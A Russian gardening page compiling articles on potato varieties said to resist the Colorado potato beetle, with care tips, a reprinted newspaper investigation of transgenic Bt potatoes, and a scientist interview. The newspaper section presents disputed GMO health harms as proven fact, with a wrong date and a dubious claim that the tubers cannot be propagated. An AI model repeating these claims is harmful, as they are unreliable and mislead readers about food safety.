6 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Популярные сорта картофеля которые не ест колорадский жук

Популярные сорта картофеля, которые не ест колорадский жук

Каждый фермер хоть раз задавался вопросом: существуют ли сорта картофеля, которые не ест Колорадский жук? От вредного насекомого каждый год теряется значительная часть урожая. Все потому, что жук может вырабатывать иммунитет к инсектицидам, а также стойко переносит холода, зарывшись глубоко под землей. В ходе долгих исследований, опытные селекционеры все же сумели вывести небольшое количество сортов картофеля, полностью устойчивого против Колорадского жука.

Популярные сорта картофеля, которые не ест колорадский жук

История создания

Каждый фермер не понаслышке знает, как опасен Колорадский жук. Его легко узнать по яркой окраске – черно-оранжевые полоски на крыльях взрослых особей. Личинки розового цвета, кладки яиц оранжевого оттенка. Паразит способен уничтожить и перепортить половину сбора плодов. В борьбе с жуками используют различные способы: выращивают устойчивые виды, пользуются отравой, собирают вредителей руками.

Еще в 1950-1960х российские фермеры начали задумываться над выведением новых видов картофеля, которые не будут привлекать Колорадских жуков. Сначала ученые придерживались версии, что, если скрестить клубни дикого картофеля с плодами культурными, то сразу же выйдет культура, которую жук будет избегать. Но на практике теория дала сбой: вырастив скрещенный овощ, все убедились в том, что такие плоды не пригодны к использованию в пищу.

Вскоре возобновили попытки выведения устойчивого сорта к нашествию насекомых. Только теперь следовало более поработать над пищевыми качествами клубней. Поэтому начали разрабатывать вид, который обладает способностью к регенерации после того, как насекомые его едят. Также сорт должен был стать непригодным для роста личинок.

Особенности устойчивого вида

Итак, следует разобраться, какими же качествами должна обладать культура, чтобы жуки обходили ее стороной. Огромное количество видов картофеля, которые стойко переносят погодные условия, имеют иммунитет к заболеваниям. Но очень редко все эти качества совмещаются с устойчивостью против вредителей, таких как Колорадский паразит. Насекомые с удовольствием едят и плоды, и листву культуры. Что отпугивает насекомое?

  1. Строение и структура кустарника. Если сортовой картофельный куст имеет толстые стебли и плотные по структуре листья, то паразит обойдет его стороной – они не съедят плотный куст.
  2. Также не привлекают насекомое и загнутые внутрь листки кустарника, им неудобно откладывать свое потомство.
  3. В сортах, устойчивых к насекомым, высокое содержание гликоалкалоидов – веществ, которые снижают активность и рост насекомых, а впоследствии снижают и их плодовитость.

Устойчивые виды овощной культуры

Среди устойчивых к болезням и погодным условиям сортов возможно выделить всего лишь очень малое количество видов, устойчивых к паразитам, особенно к Колорадским жукам.

Если вы собираетесь выращивать картофель, имеющий иммунитет к паразитам, следует ознакомиться с его свойствами и строением. Таких культур всего семь — это Брянский Надежный, Зарево, Каменский, Ласунок, Некулинский, Темп, Утро раннее. Насекомые не едят эти сорта.

Брянский надежный

Такой вид овощной культуры очень урожайный. Имеет отличные вкусовые и качественные показатели. По скорости дозрева – среднеспелый, стойкий и выносливый к Колорадам и прочим паразитам.

Плоды овальной формы, кожура тонкая, легко очищается. Мякоть плотной структуры. Минус культуры в том, что она не устойчива к нематоде и фитофторозу.

Зарево

Вид отлично переносит все погодные условия, поэтому произрастает во всех регионах страны. Отлично транспортируется на большие расстояния, имеет высокую степень лежкости.

Плоды розового цвета круглой формы. Мякоть при приготовлении отлично разваривается. Единственный минус – это склонность к растрескиванию клубней, дабы избежать этого, следует вносить в грунт калий.

Каменский

Благодаря крупным и шероховатым листочкам куста, этот вид не привлекателен для Колорадов. Очень быстро спеет, засухоустойчивый.

Кожица плодов слегка шершавая, что позволяет избежать повреждений клубней. Имеет стойкий иммунитет к раку и фитофторозу.

Ласунок

Форма плодов круглая, цвет коричневый. Подходит для приготовления любых блюд. Часто используют в промышленных масштабах при изготовлении чипсов и крахмала.

Культура среднеспелая, неприхотливая при выращивании. Устойчива к фитофторозу и нематоде.

Некулинский

Сорт уже как 20 лет прижился на всех рынках страны, его выбирают опытные фермеры под засев огромных площадей. Созрев плодов поздний, но это не мешает культуре год за годом покорять все новые и новые площади засева.

Вид выбирают за высокое содержание крахмала до 20% и стойкий иммунитет к заболеваниям и вредителям.

Если вам нужен сорт для длительного хранения и дальних перевозок, то Темп – это то, что надо. Устойчивый к плесени и прочим инфекциям, он легко переносит засуху и жару.

Кожура бежевая, размер крупный, форма плодов продолговатая. Отлично подходит для изготовления спирта и чипсов.

Утро ранее

Плоды не крупные, бежевого оттенка. Мякоть разваристая, содержание крахмала 15%.

Утро ранее устойчивый к грибковым инфекциям, имеет хорошую лежкость, отлично транспортабелен. Подходит для приготовления многих блюд, содержащих в рецептуре картофель.

Действия для отпугивания паразитов

Как стало известно, Колорад выбирает для еды кустарники, которые ослаблены и не удобрены. Если вы будете оказывать должный уход и внимание вашему будущему урожаю, то насекомые вам не страшны. Паразиты не едят здоровые кустарники.

Устойчивые к колорадскому жуку и засухе сорта картофеля

Регион черноземья по климатическим и агрономическим условиям идеален для выращивания многих сельскохозяйственных культур. Картофель, ставший «вторым хлебом» для россиян, прочно обосновался в этих краях. Но получать здесь максимальные урожаи корнеплодов мешают засухи и колорадский жук.

Выведение сортов картофеля, устойчивых к колорадскому жуку

Борьба против полосатого диверсанта ведется не один десяток лет и до сих пор преимущество на его стороне. Колорадский жук – вредитель, наносящий огромный урон сельскому хозяйству. Вид стоек к перепадам температур, действию химикатов, взрослые особи могут голодать несколько месяцев. Насекомое живет 2-3 года и активно размножается.

Способы борьбы с колорадским жуком:

Уже в 50-х годах 20 века советские ученые и простые колхозники задумывались над разработкой устойчивых к жукам сортов. Одной из первых попыток было скрещивание одомашненного картофеля с дикими предками. Гибрид, получившийся в результате, оказался несъедобен ни для жесткокрылого жука, ни для людей.

Последующие попытки искусственного отбора отрабатывались по двум направлениям:

  1. увеличение скорости регенерации биомассы, что помогло бы растению быстро восстанавливать листья и побеги;
  2. выработка такого строения листа, которое не позволит жукам откладывать личинки.

Секрет выносливости

Современная селекция идет в направлении развития урожайности и устойчивости к погодным условиям, заболеваниям, вредителям. Вот почему картофель, совмещающий все эти свойства, ценится профессионалами и любителями.

Особой проблемой является разработка сортов картофеля, которые не ест колорадский жук. Существует ряд признаков, которые указывают на то, что культура будет максимально несъедобна для паразита:

  1. Пространственная структура куста. Растение, образующее плотный куст, мощные стебли, толстые, кожистые листья, вредителю будет не по вкусу.
  2. Форма листьев. Листовые пластинки со скрученными или приподнятыми вверх краями не дают возможности отложить яйца, поэтому не привлекают насекомое.
  3. Наличие химического оружия. Содержащиеся в листьях гликоалкалоиды тормозят активность, развитие, плодовитость насекомых.

При всех достижениях селекционеров, получить картошку на 100% без колорадского жука, пока не получается. Существует еще одна закономерность. Часто картофель, который не поедается полосатым вредителем, человеку тоже не очень нравится на вкус. Приходится выбирать: воевать с жуком за урожай или есть невкусную картошку.

Сорта

Из 4 тысяч культивируемых во всем мире сортов картофеля лишь 8 практически не повреждаются вредителем.

В таблице приведены сведения о таких сортах овощной культуры:

Удача

Выведенный подмосковными специалистами ранний, универсального кулинарного назначения сорт, товарные клубни которого можно собирать уже на 45 день после посадки, неприхотливый и пластичный. Мощная, противостоящая полеганию ботва покрыта крупными темными листьями. Стабилен при неблагоприятных условиях среды – засуха, переувлажнение, жара. Имеет высокую сопротивляемость к раку, ризоктониозу, парше, фитофторозу.

Брянский надежный

Продукт российской селекции. Подходит для приготовления пюре, запекания и жарки. В гнезде содержится до 10 округлых красных клубней. Кожура гладкая, глазки более темные, чем основной цвет кожицы. Мякоть плотная и сочная. На рослых кустах распускаются темно-фиолетовые цветки.

В неблагоприятных условиях сорт подвержен фитофторозу и нематодам.

Зарево

Сорт, хорошо зарекомендовавший себя при выращивании в различных климатических поясах. Отличается лежкостью и урожайностью. Клубни с розовой кожурой и мелкими глазками богаты крахмалом и белками. Из недостатков – во время сбора урожая клубнеплоды могут трескаться. Этого легко избежать внесением в почву фосфорных и калийных удобрений с одновременным уменьшением количества азота.

Каменский

Результат труда уральских ученых. Для него характерны основательные, толстые побеги и крупные жесткие листья, которые не съедает колорадский жук. Красные, удлиненно-овальные клубни со светло-желтой мякотью и сетчатой кожицей.

  • скороспелость;
  • засухоустойчивость;
  • высокая урожайность;
  • плотная кожура;
  • стойкость к фитофторе, мозаичной инфекции, раку.

Ласунок

Сорт среднепозднего созревания, белорусской селекции. Мощная ботва с жесткоопушенной листвой. Обильное цветение, интенсивный рост. Отличается великолепным вкусом. Дает хорошие урожаи на любых почвах. Имеет выровненные клубни овальной формы с темно-желтой кожурой, покрытой сеточкой. Средняя масса одного корнеплода – 150-200 г. В гнезде вырастает до 12 штук. Картофель хорошо разваривается при готовке, мякоть не темнеет на срезе. Его вкусовые качества находятся в первой десятке вкуснейших сортов мира.

Ласунок обладает устойчивостью к фитофторозу и вирусным заболеваниям.

Никулинский

Столовый среднепоздний сорт, устойчивый к грибкам и вирусам. Культивируется в России около 20 лет. Округлые светло-бежевые клубни с незначительными глазками обладают отменным вкусом.

Довольно долгое время радует любителей и профессионалов: появился до нашествия колорадского жука, но оказался устойчив к вредителю. Кулинарные качества сорта также на высоте. Клубни отличаются высоким содержанием калия, не поражаются болезнями. Картофель имеет хорошие показатели по лежкости.

Утро раннее

Сорт среднеспелый, столового назначения. Бежевая кожица, некрупные глазки. Форма клубня округлая. Мякоть сильно разваривается. Активно сопротивляется засухе и инфекциям. «Утро раннее» хорошо хранится и транспортируется.

Как повысить устойчивость и урожайность

Способность сельскохозяйственных растений противостоять внешним факторам определяется их биологическими особенностями и качеством проводимых агротехнических мероприятий. Правильно ухаживая за посадками, мы повышаем урожайность культур и сопротивляемость вредителям. Приспособленные к атакам жука, но ослабленные неподходящим уходом, растения не смогут противостоять нашествию вредителя.

Приемы агротехники, помогающие защитить картофельные плантации от колорадского жука:

  1. Посадка после бобовых культур или по целине. На таких участках в почве отсутствуют зимующие особи насекомого и сохраняется много питательных веществ.
  2. Внесение оптимальных доз удобрений в нужные периоды развития растений – под перекопку, при посадке, во время вегетации.
  3. Подготовка посадочного материала. Качественные клубни, без признаков гнилей и других поражений дадут сильные, быстрорастущие побеги. Жуки- вредители не успеют съесть их.

Посадки сортов картофеля, обладающих устойчивостью к колорадскому жуку, позволяют снизить масштабы атак вредителя, но полного его отсутствия на культуре не гарантируют. Соблюдение севооборота, оптимальный уход, подкормки и другие агротехнические мероприятия, совместно с использованием «правильных» сортов, позволят избавиться от полосатого листоеда.

Секретная картошка ядовита для колорадского жука. А для человека?

Огородники в волненье: от жука есть избавленье? Минувшей весной садоводы всей России были взбудоражены сенсационной новостью: ученые вывели сорт картошки, которую не ест колорадский жук! Оценить ее в полной мере может лишь тот, кто сам безуспешно пытался извести жука-вредителя с картофельных гряд. А таких у нас — миллионы! Неудивительно, что картофелеводы тут же ринулись обзванивать всевозможные научные учреждения, чтобы добыть семена чудо-сорта. Но это оказалось невозможным. Им туманно отвечали, что семена завезли к нам из Америки в очень ограниченном количестве и попадут они сначала только на опытные делянки институтов. В то же время в различных изданиях появились статьи о том, что новая заморская картошка может быть опасна для здоровья человека. Наступила осень. Весь урожай картошки — в том числе и трансгенной — в России собран. Мы решили рискнуть собственным здоровьем и провести дегустацию трансгенного продукта. Однако добыть чудо-клубни даже для журналистов « КП » оказалось не так-то просто. ИЗ ДОСЬЕ «КП» Что это за фрукт и с чем его едят Поясняем: обитает в почве некая бактерия, которая вырабатывает вещество (Bt-токсин), ядовитое для колорадского жука. Биотехнологи взяли кусочек ДНК , которая отвечает за выделение этого токсина, и пересадили в ДНК картофеля. В результате получаем растение, листья которого ядовиты для колорадского жука. Спасаем урожай картошки, все сыты, довольны и смеются. На деле же все оказалось далеко не так просто и безобидно. В апреле 1988 года в Шотландии ученый с мировым именем Арпад Пустай провел серию экспериментов для выяснения, как трансгенный картофель влияет на организм крыс. Опыты длились гораздо дольше, чем при стандартных испытаниях. Первые же результаты показали, что у животных, питавшихся модифицированным картофелем, начался процесс дегенерации внутренних органов, а в некоторых случаях имело место предраковое состояние. В это время общественность была опьянена успехами биотехнологии, Арпад стал практически изгоем и сенсационные выводы его опытов «замяли». Только в 1999 году, через 11 лет, 23 независимых эксперта перепроверили результаты и признали их абсолютно верными! 12 февраля 1999 года ученые разных стран опубликовали меморандум в поддержку Пустая. «Концерны хотят быстрого успеха, а раковые заболевания развиваются десятилетиями», — заявили они. Экологи же просто не берутся прогнозировать влияние трансгенов на окружающую среду. ИСТОРИЯ ВОПРОСА Как она попала в Россию Сегодня мир поделился на два лагеря: США , Канада и Австралия активно потребляют трансгены. Остальные же страны допускают всего один процент модифицированных растений в пищевой продукции либо полностью наложили на них запрет. Неясной оставалась ситуация с Россией и развивающимися странами. Американский концерн, который практически является монополистом в производстве и продаже трансгенных растений, быстренько переориентировался на российский рынок. Денежку выделил на компанию по продвижению своей продукции немалую — аж два миллиарда долларов (сумма, равная сотой части всего валового дохода РФ ). Титулованные ученые тут же стали авторитетно доказывать, насколько нам, необразованным, нужна трансгенная продукция и каких страшных потерь урожая мы можем избежать. И проверили, дескать, и перепроверили — все сходится, спасена Россия. Быстрыми темпами биотехнологи с помощью американцев пересадили ген Bt в наши родные сорта « Невский » и «Луговской» и начали испытания на опытных полях в Краснодарском крае и в Московской области. АВТОРИТЕТНОЕ МНЕНИЕ «Жук привыкнет, зато фитофтора заведется» Для того чтобы выпустить трансгенную картошку на поля, нужна сущая малость: заключение государственной комиссии по экологической экспертизе генно-модифицированных организмов. Вот что нам рассказал эксперт Александр БАРАНОВ , входивший в состав этой комиссии: — Реклама у трансгенных продуктов мощнейшая, поэтому до людей не доходят реальные цифры и факты, изложенные в отрицательном заключении комиссии, наложившей запрет на производство картофеля c искусственно измененным генетическим кодом. А между тем: Трансгенный картофель не хранится! В результате изменения генного состава клубни становятся на 70 — 100% подверженными заболеванию фитофторой (каждый огородник знает, что эта болезнь приносит головной боли не меньше, чем колорадский жук). Вкусовые качества корнеплодов отвратительные — они годятся разве что для чипсов или картошки-фри. От трансгенного картофеля нельзя получать семенные клубни — ДНК изменена таким образом, что растения невозможно размножать вегетативно. Сделано это для того, чтобы каждый год посевной материал покупался только у «Монсанто». Жук приспосабливается! По данным Института защиты растений (г. Пушкино ), колорадский жук быстро преобразуется в формы, устойчивые к модифицированной картошке. В результате мы можем получить жука-супервредителя, который будет бояться разве что ядерной войны. ПРОГНОЗ Что с ней будет дальше? — Мы должны были рассмотреть результаты полевой и экспериментальной проверки двух трансгенных сортов картофеля, представленных американской фирмой, — продолжил свой рассказ Александр БАРАНОВ. — По мере того, как экспертиза двигалась к завершению, на членов комиссии стало оказываться давление (звонки с угрозами, анонимные письма и проч.). Несмотря на это, комиссия сочла недоказанным биологическую безопасность этих трансгенов и рекомендовала не включать их в список сортов, допущенных к использованию в Российской Федерации. Однако наше заключение так и не было утверждено вышестоящими инстанциями. А в феврале комиссию распустили без какой-либо письменной аргументации (хотя приказ о ее создании был). Сейчас формируется новая комиссия в расширенном составе. Очевидно, у кого-то наверху есть надежда, что она окажется более сговорчивой. ТОЛЬКО ЦИФРЫ До 30% импортных картофельных чипсов, которыми хрустят наши дети, сделаны из генно-модифицированного картофеля. Более 70 наименований колбасных, кондитерских и соевых изделий, производимых в Москве , изготавливаются с применением генно-модифицированной сои. Закрытые исследования, проведенные под эгидой ЕЭС , показали, что возделывание трансгенного картофеля увеличит издержки сельскохозяйственного производства до 40%. ИСПЫТАНО НА СЕБЕ Как мы охотились за клубнем-мутантом Бетонный забор, обнесенный колючей проволокой, вокруг Института фитопатологии в подмосковном Голицыне . Неприступная стена вызвала бы зависть у служб безопасности самых засекреченных объектов страны. Именно здесь проводятся тесты над трансгенной картошкой. По внутреннему телефону охранник с «блокпоста» связывается с заместителем директора института Анатолием Макаровым . «Никаких комментариев я вам давать не могу, — сухо бросает в трубку Анатолий Андреевич. — Разработки эти у нас ведутся с 1997 года. Но они держатся под секретом, в том числе и по соображениям коммерческой тайны. Можете успокоить читателей, на рынок этот картофель не попадет — по инструкции опытные образцы мы уничтожаем. » — Неужели не осталось ни одного экземпляра? Замдиректора дает понять, что разговор окончен. Пропустить на территорию института без его разрешения охранники отказываются. Объезжаем забор по периметру. Неподалеку местный житель Григорий везет на своей таратайке навоз. — Батя, нас отправили на опытные поля, а мы заблудились. — Так это вам картошка нужна, которую жуки не «хавают»? Ее со складов института рабочие тащат и на свои огороды содють. Так что можете на любом участке найти. А вообще-то у них ее и на хранилищах полно, — Григорий кивает в сторону забора. — Эту картошку, кстати, можно и в другом месте найти. Григорий рисует нам схему подъезда на опытные поля, находящиеся в трех километрах от института, и открывает по секрету кодовое имя, с помощью которого можно проникнуть за очередной забор. Прибываем в экспериментальное хозяйство. Без труда проходим КПП. Вдоль дороги яблони с наливными фруктами да два картофельных поля. Как мы ни пытались, как пристально ни приглядывались, но не смогли найти даже божьей коровки на листиках. Под шумок осенних листьев с обоих полей набираем экспериментальных овощей, а затем идем к местному начальнику Виктору Пономареву . — Не выращивали мы в этом году трансгенной картошки, — с ходу режет Виктор Дмитриевич. — А в прошлом? — Я здесь всего год работаю. — А отличается эта трансгенная картошка чем-нибудь от обычной? — поигрываем только что собранными клубнями. — Да практически ничем — ни вкусом, ни. — обрывает себя на полуслове Виктор Пономарев. Возвращаемся к институту и решаем во что бы то ни стало проникнуть на его территорию. — Где у вас тут трансгенный картофель? — подходим с важным видом к женщине в белом халате. — А вы кто? — Общество защиты колорадских жуков «Антифумигатор-плюс»! Нужны опытные клубни для экспериментов. Через 20 минут женщина выносит три картофелины: «Прямо со склада!» Довольные проделанной оперативной работой едем в редакцию и в столовой отвариваем все три образца. Картошка на вкус показалась нам самой обыкновенной, а с солью и свежим огурчиком — так и вовсе ничего. Боимся, что именно поэтому подмосковные огородники будут и дальше стараться добывать трасгенные сорта всеми правдами и неправдами. Нам бы только от проклятого жука избавится. А что в будущем козленочками можем стать — так это когда еще будет. И ЕЩЕ ФАКТ Африка против трансгенных продуктов Скандал разразился на Всемирном саммите по устойчивому развитию в Йоханнесбурге , который проходил с 26 августа по 6 сентября. Его спровоцировали представители Замбии и Зимбабве , которые отказались от помощи в виде генно-модифицированной продукции. Делегаты еще 135 африканских стран поддержали отказ, выразившись резко: «Наши страны — не свалка для трансгенных продуктов, от которых отказались Европа и Америка!» Дэвид Кинг, советник премьер-министра Великобритании , заявил, что позиция США по навязыванию генно-модифицированной пищи развивающимся странам сомнительна с моральной точки зрения и является массовым экспериментом над людьми. Попытки американцев все же «протолкнуть» свои трансгенные детища окончились тем, что госсекретаря США Колина Пауэлла, пытавшегося что-то возразить, буквально освистали. Остается только гадать, к какому лагерю примкнет Россия. КСТАТИ У москвичей еще есть выбор Сейчас по распоряжению правительства г. Москвы создается комиссия по разработке проекта городского закона «Об обязательных требованиях к производству и реализации товаров, выполнению работ и оказанию услуг для потребителей, содержащих маркировку «Экологически чистый в г. Москве» в рамках программы «Мир» по экологической маркировке продуктов питания». Другими словами, москвичи будут иметь информацию, а значит, и свободу выбора. P.S. На момент подписания номера физическое состояние дегустаторов трансгенного картофеля опасений не вызывало.

Понравился материал?

Подпишитесь на еженедельную рассылку, чтобы не пропустить интересные материалы:

Сорта картофеля, устойчивые к колорадскому жуку − миф или реальность?

Добавление статьи в новую подборку

Устойчивость сортов картофеля к колорадскому жуку зависит от многих факторов. Это и уход, и агротехника, и даже “вкус” листьев. Впрочем, о некоторых сортах можно с уверенностью сказать, что им полосатый вредитель в принципе не страшен.

Колорадский жук является одним из самых опасных и живучих вредителей. В борьбе с ним человечество пока проигрывает. Почему? Насекомые активно размножаются, за счет этого популяция уже через несколько сезонов достигает сотен, а то и тысяч особей. Взрослым жукам не страшны перепады температур и воздействие различных химических препаратов (которые скорее навредят людям и погубят картофель, чем вредителей).

При необходимости колорадский жук “садится на диету” и его не пугает отсутствие пищи в течение нескольких месяцев. Даже по меркам насекомых, колорадский жук – долгожитель: на юге встречаются особи, которым 3 года от роду! Он не боится практически ничего.

В европейскую часть России колорадский жук попал в конце 40-х годов

Легко ли бороться с колорадским жуком?

Трудно найти в природе более хитрое и бесстрашное насекомое, чем колорадский жук. На любой предложенный ему метод борьбы у жука есть устойчивое “противоядие”:

  • птицы и животные, как естественные враги насекомых, в данном случае не помогают. Колорадский жук не зря имеет яркую и запоминающуюся полосатую окраску. Этим он предупреждает всех желающих “закусить жуком”, что его тело содержит токсичные вещества, которые он получает из листьев и побегов пасленовых. Мало кто из птиц и животных желает мучиться отравлением, поэтому природных врагов у колорадского жука почти нет. А те, что есть, не наносят урона популяции;
  • обработка инсектицидами. У колорадского жука очень быстро вырабатывается иммунитет к любым химикатам. Поэтому их нужно постоянно обновлять и менять. Это делается не всегда, что позволяет жуку плодиться и дальше, попутно уничтожая урожай.
  • сбор жуков и личинок вручную. Этот метод эффективен только на небольших участках, на посадках же промышленных масштабов требует постоянной занятости большого количества людей. Жуки, которые чувствуют опасность, притворяются мертвыми и лежат лапками кверху. При этом они могут выжить в банке с водой на протяжении 10 дней и даже будучи замороженными, живут еще 2 суток.

С сильными ветрами колорадские жуки могут переноситься на десятки километров

В последнее время заговорили еще об одной мере борьбы – выращивании сортов картофеля, устойчивых к колорадскому жуку. Неужели удалось обмануть хитрое насекомое?

Существуют ли сорта картофеля “без жука”?

Колорадский жук – тот еще “лакомка”. И личинки, и взрослые насекомые предпочитают мягкие, молодые и нежные листочки и побеги. Им важно, чтобы растение было “вкусным”, а от трапезы не отвлекали резкие запахи высаженных рядом бораго (огуречной травы), чеснока, календулы или фасоли.

Эти пищевые табу селекционеры и попытались обернуть против вредителя. Многолетний опыт позволил ученым сделать определенные выводы:

  • колорадский жук реже повреждает растения с грубыми, плотными листьями, покрытыми волосками;
  • неприятный (с точки зрения жука) вкус листьев отпугивает насекомое;
  • высокая степень регенерации побегов позволяет снизить потери урожая;
  • внедрение в геном растений особых генов, формирующих токсичный для жука белок, позволяет отвадить непрошенного гостя.

Прожорливые личинки наносят картофелю основной урон

В любом случае, получить на 100% абсолютно устойчивый к колорадскому жуку в любой климатической зоне сорт картофеля пока не удалось. Можно вести речь либо об относительной устойчивости (поражается жуком меньше), либо о внедрении трансгенных сортов, безопасность которых для человека пока находится под вопросом. Кроме того, “невкусные” для жука сорта кажутся таковыми и человеку. Поэтому всегда приходится выбирать: или вести борьбу с жуком за “второй хлеб”, или питаться не самым лучшим картофелем, который не нравится даже колорадскому жуку.

Относительно устойчивые к колорадскому жуку сорта картофеля

Предлагаем ознакомиться с подборкой сортов картофеля, относительно устойчивого к колорадскому жуку и некоторым заболеваниям.

Брянский надежный

Высокоурожайный сорт, занимающий лидирующие позиции как по вкусовым качествам, так и по устойчивости к различным вредителям и болезням, в том числе и колорадскому жуку. Клубни аккуратные, овально-округлой формы, с гладкой кожурой и небольшими глазками. Мякоть плотная и сочная, годится для различных блюд. При неблагоприятных условиях растение может атаковать фитофтора и нематоды.

Сорта картофеля VS колорадский жук: мнение эксперта

Какой способ борьбы с жуком самый эффективный и как жук появился в Сибири – на эти и другие вопросы корреспонденту VN.ru ответил ведущий научный сотрудник Института цитологии и генетики СО РАН, кандидат сельскохозяйственных наук Николай Полухин.

– Николай Иванович, среди селян бытует мнение, что есть сорта картофеля, устойчивые к колорадскому жуку. Некоторые даже выписывают сорта за неплохие деньги из Белоруссии и Украины. Так ли это?

– В США в штате Колорадо 100 лет назад был создан Институт по борьбе с колорадским жуком. Но за целый век американцы не смогли создать ни одного устойчивого сорта картофеля к нему. Хотя несколько лет назад была информация о том, что генетики ввели в геном картофеля ген, который отвечает за наработку фермента, разрушающего хитиновый покров насекомого. У жука, который посидел и поел листья такого растения, отпадают крылья, разрушаются лапки, и он гибнет. Но потреблять такой картофель человеку в пищу нельзя…

Мы тоже искали сорта, которые не нравятся колорадам. Провели эксперимент:

предложили насекомым 40 сортов картофеля. Оказалось, что больше всего им нравится «Невский», «Лина», «Светлана», «Киевский».

Их убрали. Но насекомые стали пожирать листья менее вкусных сортов, далее листья всех оставшихся сортов картофеля – и красного, и белого – и так до последнего.

– Откуда в Сибири появился колорадский жук? Есть такое мнение, что это насекомое завезли сюда с яблоками.

– История заселения Сибири колорадским жуком началась в 1976 году. В то время на территории Новосибирской области работала станция защиты растений. Оттуда шли предупреждения о появлении вредителей, болезней. И вот поступила информация, что в Луговском совхозе Новосибирского района появились эти вредители. Тогда там был совхоз-техникум, сотрудники которого выписали из Голландии новый сорт картофеля «Романо». Вот с этим картофелем впервые и завезли вредителей, которые, видимо, сохранились прямо в клубнях и земле.

Кандидат сельскохозяйственных наук Николай Полухин наблюдает за колорадским жуком с момента появления вредителя на территории региона. Фото Алексея Танюшина

Я был аспирантом. Меня отправили в этот совхоз, где я впервые увидел полосатых жуков. Личинок и жуков мы, конечно, тщательно собрали и сожгли. Но, видимо, не всех – часть зарылась в листву и в землю. В 1977 году была очень жестокая зима и в течение последующих двух лет жука не было. Затем вновь была в Сибири зафиксирована вспышка этих вредителей. Сам взрослый жук может летать, таким образом также распространяясь по территории.

– Как правильно бороться с вредителем, чтобы получить лучший эффект? Некоторые даже огороды перекапывают поглубже, и снег счищают, чтобы земля промерзала, но почему-то весной эти зловредные жуки снова появляются.

– Что вполне ожидаемо, ведь они закапываются в землю на глубину до 90 сантиметров ! То есть ниже промерзающего слоя. Понятно, что достать их оттуда не реально. Кстати, по поведению колорадских жуков можно предсказывать погоду на длительный срок: в преддверии засушливого лета они могут вообще не выползать из земли.

Ученые ведут поиски устойчивого к жуку сорта кратофеля. Фото Алексея Танюшина

Рецепты борьбы с колорадом давно известны: нужно ежедневно собирать личинки и жуков, сжигать или заливать в банке керосином. Если вредителей на участке много, то поможет только химия. Но выбирать нужно эффективное средство, которое достаточно раз использовать на весь период вегетации.

– То есть рецепта спасения пока не существует… Очень жаль. А как идет импортозамещение семян картофеля на отечественные? Ведь до 2014 года семена «второго хлеба» в основном закупали за рубежом.

– Действительно картофель даже самого великолепного сорта постепенно теряет качества, и сортовые и семенные, и через 5-7 лет его нужно обязательно обновлять. Семеноводством картофеля мы занимаемся с 1968 года, но в «лихие 90-е» финансирование сильно урезали. Поэтому и работа шла медленно. Сейчас наш институт вошел в программу «Селекция и семеноводство картофеля России», стали поступать деньги на новое оборудование. Мы приобрели аэро- и гидропоновые установки, которые позволили повысить эффективность работы по семеноводству.

В лаборатории собрана богатая коллекция оздоровленных сортов картофеля. Фото Алексея Танюшина

В нашей лаборатории, можно сказать, идет реанимация картофеля. В клубне есть точка роста, где клетки так стремительно делятся, что инфекция, вирусы не успевают туда проникнуть. Мы из этой чистой клетки выращиваем растение, которое становится родоначальником. Сначала получаем росточки, помещаем в пробирки и размножаем. Из них выращиваем чистые мини-клубни высокого качества, которые становятся родоначальниками будущих семян. Раньше размножали в теплицах, но шло это медленно – в год могли получить только один урожай. Но вот уже второй год при помощи аэро- и гидропонных установок за год получаем несколько урожаев. Сейчас в нашей лаборатории находится коллекция оздоровленных 400 лучших сортов отечественной и зарубежной селекции картофеля.

Между тем, садоводы не устают искать новые способы борьбы с колорадским жуком. Растворы горчицы и дегтя уже не в тренде, теперь используют опилочный компост. Представитель семейства листоедов – головная боль фермеров. Картофель, томаты, баклажаны, физалис – любимые растения колорадского жука. Он поедает листья, из-за нехватки солнца и опыления гибнет урожай.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
